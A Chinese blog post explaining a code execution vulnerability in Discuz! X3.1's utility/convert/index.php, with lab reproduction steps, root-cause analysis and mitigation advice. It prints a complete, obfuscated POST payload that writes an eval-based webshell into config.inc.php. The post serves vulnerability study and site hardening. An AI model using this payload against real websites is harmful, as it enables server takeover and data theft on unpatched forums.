Discuz X3.1漏洞,你了解多少?

漏洞

漏洞版本:Discuz! X3.1及以下版本。

Discuz X3.1漏洞,你了解多少?插图1

漏洞描述:Discuz! X3.1的插件/utility/convert/index.php存在代码执行漏洞,如果用户在使用完之后不删除,会导致网站容易被入侵。

漏洞复现步骤

一、环境搭建

1、使用phpstudy搭建网站。

2、解开Discuz! X3.1的源码压缩包,进行安装。

3、选择全新安装,运行环境。

4、填写数据库及管理员信息,完成安装。

5、点击上方链接访问网站。

二、漏洞利用

Discuz X3.1漏洞,你了解多少?插图3

1、访问网站。

2、抓取数据包,进行数据包重放。

3、发包后出现phpinfo信息,证明漏洞存在。

三、完整payload

a=config&source=d7.2_x2.0&newconfig[aaa%0a%0deval(CHR(101).CHR(118).CHR(97).CHR(108).CHR(40).CHR(34).CHR(36).CHR(95).CHR(80).CHR(79).CHR(83).CHR(84).CHR(91).CHR(99).CHR(93).CHR(59).CHR(34).CHR(41).CHR(59));//]=aaaa&submit=yes

漏洞原理与分析

index.php文件分析:打开utility/convert/index.php的源码,可以看到该文件包含了common.inc.php文件,并定义了$action变量,该变量从POST请求中获取。

do_config.inc.php文件分析:当$action为"config"时,包含do_config.inc.php文件,该文件负责创建config.inc.php文件,并将POST的数据直接写入该文件中,无任何过滤检测。

payload详解:通过构造特定的POST请求,攻击者可以注入恶意PHP代码,这些代码将被写入config.inc.php文件中,并在下次访问时执行。

安全建议

删除/utility/convert目录:作为临时解决方案,可以删除该目录以防止漏洞被利用。

Discuz X3.1漏洞,你了解多少?插图5

全面升级Discuz版本:升级到最新版本以修复已知的安全漏洞。

过滤language参数:在处理language参数时进行全面的安全过滤,限制特殊字符和恶意代码的执行。

限制脚本执行权限:对discuz目录的权限进行安全分配,限制data目录的脚本执行权限。

Discuz! X3.1的utility/convert/index.php文件存在严重的代码执行漏洞,攻击者可以通过构造特定的POST请求来注入并执行恶意PHP代码,为了保障网站安全,建议采取上述安全措施进行修复和加固。

小伙伴们,上文介绍by discuz x3.1漏洞的内容,你了解清楚吗?希望对你有所帮助,任何问题可以给我留言,让我们下期再见吧。

本文来源于互联网,如若侵权,请联系管理员删除,本文链接:https://www.9969.net/90569.html

小末小末
上一篇 2024年11月5日 12:31
下一篇 2024年11月5日 12:58

相关推荐